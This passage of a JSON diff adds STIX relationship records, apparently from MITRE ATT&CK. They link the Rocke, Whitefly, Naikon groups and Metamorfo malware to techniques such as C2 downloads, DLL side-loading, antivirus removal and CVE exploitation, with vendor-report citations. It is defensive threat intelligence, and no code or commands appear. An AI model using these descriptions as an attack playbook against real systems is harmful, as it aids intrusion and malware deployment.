+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.670Z",
+ "created": "2020-05-26T16:17:59.670Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--30d1528d-6a50-47b2-ab5c-eb9074adc716",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.631Z",
+ "created": "2020-05-26T16:17:59.674Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.(Citation: Talos Rocke August 2018)(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5d8e9a49-f534-4cb6-9e3e-aebacb3c1dd0",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.620Z",
+ "created": "2020-05-26T16:17:59.683Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e8095f70-12de-4330-a293-25c4b4f22ffc",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.567Z",
+ "created": "2020-05-26T16:17:59.685Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--49a68076-c596-412d-a8af-3e238dfef960",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.687Z",
+ "created": "2020-05-26T16:17:59.687Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--31e01486-8827-41cd-a21b-dc420554d1bb",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.747Z",
+ "created": "2020-05-26T16:17:59.747Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used malware to download additional malicious files to the target system.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3e039f64-08da-4bb3-b8d5-1ed6428980ac",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.750Z",
+ "created": "2020-05-26T16:17:59.750Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--06508c23-746d-4894-b414-cff925692bd5",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.751Z",
+ "created": "2020-05-26T16:17:59.751Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has distributed cryptomining malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--46c37037-00da-4cf5-bde1-4296e10e6483",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.753Z",
+ "created": "2020-05-26T16:17:59.753Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used a simple remote shell tool that will call back to the C2 server and wait for commands.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--92b00f56-c9ac-4e48-9890-40b78ab0c361",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.930Z",
+ "created": "2020-05-26T17:14:42.930Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.(Citation: Symantec Whitefly March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--76681016-c8a2-4dcf-bac5-4a58749f326d",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.955Z",
+ "created": "2020-05-26T17:14:42.955Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used malicious .exe or .dll files disguised as documents or images.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--983bd6cd-907a-430d-a6ec-0ca024ca87ae",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.958Z",
+ "created": "2020-05-26T17:14:42.958Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1898925b-236a-4847-8a97-e934c07cdde1",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.959Z",
+ "created": "2020-05-26T17:14:42.959Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has encrypted the payload used for C2.(Citation: Symantec Whitefly March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--95c6eafc-4b3f-404b-86d9-13b4ae4845da",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.964Z",
+ "created": "2020-05-26T17:14:42.964Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eda182e5-ad1a-466b-8ede-664a2c778076",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.966Z",
+ "created": "2020-05-26T17:14:42.966Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aca1a51b-89a5-45e9-bce5-14b5a0a4c0f1",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.968Z",
+ "created": "2020-05-26T17:14:42.968Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used search order hijacking to run the loader Vcrodat.(Citation: Symantec Whitefly March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2e2daf37-1d3d-4b24-ab46-dfc894f9ef96",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.986Z",
+ "created": "2020-05-26T17:14:42.986Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has searched files and directories for various files and strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f45f18e9-4a0c-4f22-8ef6-5a18314535ea",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.852Z",
+ "created": "2020-05-26T18:03:17.256Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2e418dd3-d6dc-4d02-a555-2b3a13936dc3",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.884Z",
+ "created": "2020-05-26T18:03:17.283Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--44533bc7-0368-4269-b465-7e08d3a8beea",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.901Z",
+ "created": "2020-05-26T18:03:17.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has obfuscated and encrypted some payloads.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a299dae-7ee2-4e5e-8be6-eb014f58205b",
+ "type": "relationship",
+ "modified": "2020-06-24T18:16:36.641Z",
+ "created": "2020-05-26T18:37:13.094Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written its executable path to the Registry Run key to achieve persistence.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--4be5482c-2a58-41af-a7d7-477c596b4622",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.902Z",
+ "created": "2020-05-26T18:49:10.050Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has used DLL side-loading to load malicious DLL's into legitimate executables.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d4657411-8fa6-4bbc-9ed0-474eafd14375",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.254Z",
+ "created": "2020-05-26T19:31:59.254Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has convinced victims to open malicious attachments to execute malware.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d159e441-b30b-464a-8838-b83864173e89",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.263Z",
+ "created": "2020-05-26T19:31:59.263Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6f38eb77-da3f-4a35-b048-32a4fa6c6fbc",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.257Z",
+ "created": "2020-05-26T19:31:59.257Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has used malicious e-mail attachments to deliver malware.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--80fb05e9-68b8-4e3f-bc9a-2a5f828c397c",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.275Z",
